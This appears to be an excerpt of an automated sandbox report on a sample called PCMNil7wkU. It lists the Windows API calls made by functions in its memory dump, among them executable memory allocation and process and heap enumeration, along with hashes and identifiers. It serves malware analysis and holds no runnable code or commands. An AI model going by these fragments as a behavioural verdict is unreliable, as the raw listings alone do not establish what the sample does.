                                                                                                    • Instruction ID: 84bfe0c73dda96b92c79767f2b61ec7dee0dbc9a677d3a47c3c1f9292c2aabff
                                                                                                    • Opcode Fuzzy Hash: f573ade78a336dd4723e6fd7a98d565a78c6aeba897005d26862891ebc9d14c6
                                                                                                    • Instruction Fuzzy Hash: D3C08CB03062000E3F50B5FC0EC045A06884A44139320AFA1F429C31E2D7A2B0632010
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeString
                                                                                                    • String ID:
                                                                                                    • API String ID: 3341692771-0
                                                                                                    • Opcode ID: 4c26b98c80642be3bb457a0a6325ed943588a8704c231b59171f708dcadf21d2
                                                                                                    • Instruction ID: 292fcd630b73b29f5ff7d7a1d85a5ba32a8df515cee7849ded3e19f33108f643
                                                                                                    • Opcode Fuzzy Hash: 4c26b98c80642be3bb457a0a6325ed943588a8704c231b59171f708dcadf21d2
                                                                                                    • Instruction Fuzzy Hash: D7C012B56512301BFB319A5C9CC0B5563CC9B06295F5440E5E504DB280E3A4BC004350
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • SysFreeString.OLEAUT32(0415C89C), ref: 04104F76
                                                                                                    • SysReAllocStringLen.OLEAUT32(04168B50,0415C89C,00000016), ref: 04104FBE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: String$AllocFree
                                                                                                    • String ID:
                                                                                                    • API String ID: 344208780-0
                                                                                                    • Opcode ID: 93a5ce073feb878bcb9b2f43cb14a0c0014240474e4f6b899e299ef47583e6fd
                                                                                                    • Instruction ID: 7e59e4c4f6ad1d7016ec21405bff35863ea1f1e0ae7997adb9bde54b2ccd3f5c
                                                                                                    • Opcode Fuzzy Hash: 93a5ce073feb878bcb9b2f43cb14a0c0014240474e4f6b899e299ef47583e6fd
                                                                                                    • Instruction Fuzzy Hash: 9BD0807411420169AE2C753C45C583772699AD534179FC2ED6A02471C0E7F5FC00D730
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • timeSetEvent.WINMM(00002710,00000000,04168704,00000000,00000001), ref: 04168720
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Eventtime
                                                                                                    • String ID:
                                                                                                    • API String ID: 2982266575-0
                                                                                                    • Opcode ID: a40f4f89cd1a92cb711b9289cbdf2343423965561d54446d4d0d5684869c73c8
                                                                                                    • Instruction ID: 0ff679d4ab0c887eb0ac8d5c07cb239ca37bfdb9757a164f1b180e07affa90b0
                                                                                                    • Opcode Fuzzy Hash: a40f4f89cd1a92cb711b9289cbdf2343423965561d54446d4d0d5684869c73c8
                                                                                                    • Instruction Fuzzy Hash: 65C092F0382300BAF62066AA2DD2F27118CE344B28F104825B602FE2C1D2E6AC1092A1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • SysAllocStringLen.OLEAUT32(00000000,?), ref: 04104F47
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocString
                                                                                                    • String ID:
                                                                                                    • API String ID: 2525500382-0
                                                                                                    • Opcode ID: 61128e9512ae7fb8001b69d029d8ec20854896d5f37afe652109874d530df956
                                                                                                    • Instruction ID: 30987c61955555e63e7d814eb048019f88ba43796a0b868e730e9def72521752
                                                                                                    • Opcode Fuzzy Hash: 61128e9512ae7fb8001b69d029d8ec20854896d5f37afe652109874d530df956
                                                                                                    • Instruction Fuzzy Hash: 26B0123831C24120FA5030A50DC0B3202DC0F00385F85C0D1AF18C00C5EBC9F8156035
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 04104F5F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeString
                                                                                                    • String ID:
                                                                                                    • API String ID: 3341692771-0
                                                                                                    • Opcode ID: a73baa7010e2214fc82cb9e8665bcb2621c1da538b25aa4ddb9b3979219b4310
                                                                                                    • Instruction ID: 153c935711061f86b14c550257033ac29fcb8fbb4960745918cf42323f7e93a1
                                                                                                    • Opcode Fuzzy Hash: a73baa7010e2214fc82cb9e8665bcb2621c1da538b25aa4ddb9b3979219b4310
                                                                                                    • Instruction Fuzzy Hash: 2AA022BC00030328AF0B323C00C0A3A22323FC03083ECC0FC02000A0808FBFB000C020
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 0411E99A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 4275171209-0
                                                                                                    • Opcode ID: 7412f7cdcefefb600e78eb11408d99bc31232b3c5936744e94ada9414ed35def
                                                                                                    • Instruction ID: 03158c749a7a0417f3cf4329df150236d796fe4a16f63e54a77103a0716976c8
                                                                                                    • Opcode Fuzzy Hash: 7412f7cdcefefb600e78eb11408d99bc31232b3c5936744e94ada9414ed35def
                                                                                                    • Instruction Fuzzy Hash: 121148342803198BE750DF59C9C0B52F7E5EF88390B10C63AE9999B395D774FA188BA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,04101A9F,?,0410209C), ref: 0410167E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 4275171209-0
                                                                                                    • Opcode ID: b31c84fa486ee8afa5c79da355c4ba3b33e389e1deaa6bde3fd4c85b0959324a
                                                                                                    • Instruction ID: e9152fabd60af9f58bf60b476c595dd0b575438548716b55d928a3bea49406bf
                                                                                                    • Opcode Fuzzy Hash: b31c84fa486ee8afa5c79da355c4ba3b33e389e1deaa6bde3fd4c85b0959324a
                                                                                                    • Instruction Fuzzy Hash: 1AF0ECF07213009BEB0ADF7A9D847017AD2EB89344F148179D615DB2D4EBB99C418B10
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,0410209C), ref: 04101740
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 4275171209-0
                                                                                                    • Opcode ID: 207d7e42526b5b6aaede94de6c1a42d96faf196252d8527f889bdd47f4a0ef78
                                                                                                    • Instruction ID: 082189e96d468a481322b4442f9e2a1a23a10350fe3eb7ea23ffe22949950b64
                                                                                                    • Opcode Fuzzy Hash: 207d7e42526b5b6aaede94de6c1a42d96faf196252d8527f889bdd47f4a0ef78
                                                                                                    • Instruction Fuzzy Hash: E4F09AF2A016557BE7118E9A9CC0B82BB94FB00364F054139FA489B384DBBAAC408B94
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,04102080), ref: 041017A0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 1263568516-0
                                                                                                    • Opcode ID: ef25cd7fb40bae38c42fcc6c4e4ca98ac9458e1212ff59d12b9ab878d0c4f9d1
                                                                                                    • Instruction ID: bff206e01f549bd97d433d5d40e807c044c8637d596eb4c4fb7db865f1779dd8
                                                                                                    • Opcode Fuzzy Hash: ef25cd7fb40bae38c42fcc6c4e4ca98ac9458e1212ff59d12b9ab878d0c4f9d1
                                                                                                    • Instruction Fuzzy Hash: AEE046753013017EE7101EBA4DC0B52AAD8EB487A5F2884A9F641DB281DBE9BC008BA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,04158AA7,?,?,04158B39,00000000,04158C15), ref: 04158834
                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0415884C
                                                                                                    • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0415885E
                                                                                                    • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 04158870
                                                                                                    • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 04158882
                                                                                                    • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 04158894
                                                                                                    • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 041588A6
                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 041588B8
                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 041588CA
                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 041588DC
                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 041588EE
                                                                                                    • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 04158900
                                                                                                    • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 04158912
                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32First), ref: 04158924
                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 04158936
                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 04158948
                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0415895A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                    • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                                    • API String ID: 667068680-597814768
                                                                                                    • Opcode ID: ab5e186430cb189cd95ca6742ca0ccde66ca5b3a026c5b1ab990bbe2463c447a
                                                                                                    • Instruction ID: 7cecf7f35c64a12894cce160b619a11a976fc6dedcfec0faa2b8d4bb9f3ffaf9
                                                                                                    • Opcode Fuzzy Hash: ab5e186430cb189cd95ca6742ca0ccde66ca5b3a026c5b1ab990bbe2463c447a
                                                                                                    • Instruction Fuzzy Hash: 003187B0A40790EFEF04EBA598C6BA537E8EF457447004565E824CF254DBB9ACA8CF16
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetObjectA.GDI32(00000000,00000054,?), ref: 04124FFC
                                                                                                    • GetDC.USER32(00000000), ref: 0412500D
                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 0412501E
                                                                                                    • CreateBitmap.GDI32(00000000,?,00000001,00000001,00000000), ref: 0412506A
                                                                                                    • CreateCompatibleBitmap.GDI32(00000028,00000000,?), ref: 0412508E
                                                                                                    • SelectObject.GDI32(?,?), ref: 041252EB
                                                                                                    • SelectPalette.GDI32(?,00000000,00000000), ref: 0412532B
                                                                                                    • RealizePalette.GDI32(?), ref: 04125337
                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 041253A0
                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 041253BA
                                                                                                    • SetDIBColorTable.GDI32(?,00000000,00000002,?,?,00000000,?,00000000,00000000,04125548,?,00000000,0412556A,?,00000000,0412557B), ref: 04125402
                                                                                                    • FillRect.USER32(?,?,00000000), ref: 04125388
                                                                                                      • Part of subcall function 04121CEC: GetSysColor.USER32(?), ref: 04121CF6
                                                                                                    • PatBlt.GDI32(?,00000000,00000000,?,?,00FF0062), ref: 04125424
                                                                                                    • CreateCompatibleDC.GDI32(00000028), ref: 04125437
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 0412545A
                                                                                                    • SelectPalette.GDI32(?,00000000,00000000), ref: 04125476
                                                                                                    • RealizePalette.GDI32(?), ref: 04125481
                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 0412549F
                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 041254B9
                                                                                                    • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 041254E1
                                                                                                    • SelectPalette.GDI32(?,00000000,000000FF), ref: 041254F3
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 041254FD
                                                                                                    • DeleteDC.GDI32(?), ref: 04125518
                                                                                                      • Part of subcall function 04122AA8: CreateBrushIndirect.GDI32(?), ref: 04122B53
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ColorSelect$CreatePalette$Object$Compatible$BitmapRealizeText$BrushDeleteFillIndirectRectTable
                                                                                                    • String ID:
                                                                                                    • API String ID: 1299887459-0
                                                                                                    • Opcode ID: d4317065e24dc35d8d48c90fcc4380d8ad4c5a298f2e633e4f98fe2226a7db93
                                                                                                    • Instruction ID: 260082845147ec2d93d907ce7a90f55ec00ccb1fe80581fce279c9f1e85f76d0
                                                                                                    • Opcode Fuzzy Hash: d4317065e24dc35d8d48c90fcc4380d8ad4c5a298f2e633e4f98fe2226a7db93
                                                                                                    • Instruction Fuzzy Hash: 7712E675A00219AFEB10EFA8CAC4F9EB7F9EB08314F118455F918EB291D775E950CB60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: RegisterAutomation$vcltest3.dll
                                                                                                    • API String ID: 0-2963190186
                                                                                                    • Opcode ID: c2522029c941f133d304675ea2e157d7feda6d2a5ff370a1dd09060936bfe8cf
                                                                                                    • Instruction ID: 36c1d35cc5f34daadfd5dbf79a6b1aa4c8c9d76e2a0d488e7383e92d6d76d3b1
                                                                                                    • Opcode Fuzzy Hash: c2522029c941f133d304675ea2e157d7feda6d2a5ff370a1dd09060936bfe8cf
                                                                                                    • Instruction Fuzzy Hash: B7E13B35A44208EFEB18DBA8C5C4ADDB7B5AB04394F1582A5EC359B2B5D730FE40DB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,04107A18,04100000,0416A794), ref: 04105C35
                                                                                                    • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 04105C4C
                                                                                                    • lstrcpynA.KERNEL32(?,?,?), ref: 04105C7C
                                                                                                    • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,04107A18,04100000,0416A794), ref: 04105CE0
                                                                                                    • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,04107A18,04100000,0416A794), ref: 04105D16
                                                                                                    • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,04107A18,04100000,0416A794), ref: 04105D29
                                                                                                    • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,04107A18,04100000,0416A794), ref: 04105D3B
                                                                                                    • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,04107A18,04100000,0416A794), ref: 04105D47
                                                                                                    • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,04107A18,04100000), ref: 04105D7B
                                                                                                    • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,04107A18), ref: 04105D87
                                                                                                    • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 04105DA9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                    • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                    • API String ID: 3245196872-1565342463
                                                                                                    • Opcode ID: e445b7aab81a7b91a3929b89dc50a0f25977857ab174a3c41df27fc5d5c69405
                                                                                                    • Instruction ID: a3187dbc7c438a07edd1a9772ebc03d771bcb498d778051d4487ac8204fe9836
                                                                                                    • Opcode Fuzzy Hash: e445b7aab81a7b91a3929b89dc50a0f25977857ab174a3c41df27fc5d5c69405
                                                                                                    • Instruction Fuzzy Hash: E4415E72D00659BFDB10DEE8CCC8ADEB7FEAF48304F1485A6A555E7280D7B4AA448F50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LoadString
                                                                                                    • String ID:
                                                                                                    • API String ID: 2948472770-0
                                                                                                    • Opcode ID: 392b843be54b4c958587514d350ba550f603e590ba17a9e157ce56c2f1ccd237
                                                                                                    • Instruction ID: 4b5506c1270ef107da0265da85dd140d0e046d409131f699947cab7ade83a7bc
                                                                                                    • Opcode Fuzzy Hash: 392b843be54b4c958587514d350ba550f603e590ba17a9e157ce56c2f1ccd237
                                                                                                    • Instruction Fuzzy Hash: CA024931B04244EFEB11EFA8D9C5B9D7BF4AF48304F1640A0E914AB3A1DB75BE819B50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 04105EF8
                                                                                                    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 04105F05
                                                                                                    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 04105F0B
                                                                                                    • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 04105F36
                                                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 04105F7D
                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 04105F8D
                                                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 04105FB5
                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 04105FC5
                                                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 04105FEB
                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 04105FFB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                    • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                    • API String ID: 1599918012-2375825460
                                                                                                    • Opcode ID: 45fc842c7ee497589fb0a595117f7bdcb306d77cf451f18dfb781db247336ba0
                                                                                                    • Instruction ID: 62b3a01b5876f77d37a0394ebbcd61c38e7cbbf65f2d507301fc079a399661fb
                                                                                                    • Opcode Fuzzy Hash: 45fc842c7ee497589fb0a595117f7bdcb306d77cf451f18dfb781db247336ba0
                                                                                                    • Instruction Fuzzy Hash: F6317771E4025C3AFB25D9B8DCCABEE7BAD9B04344F4481E1A644E61C5D7F8AB448F50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • IsIconic.USER32(?), ref: 0414225B
                                                                                                    • GetWindowPlacement.USER32(?,0000002C), ref: 04142278
                                                                                                    • GetWindowRect.USER32(?), ref: 04142291
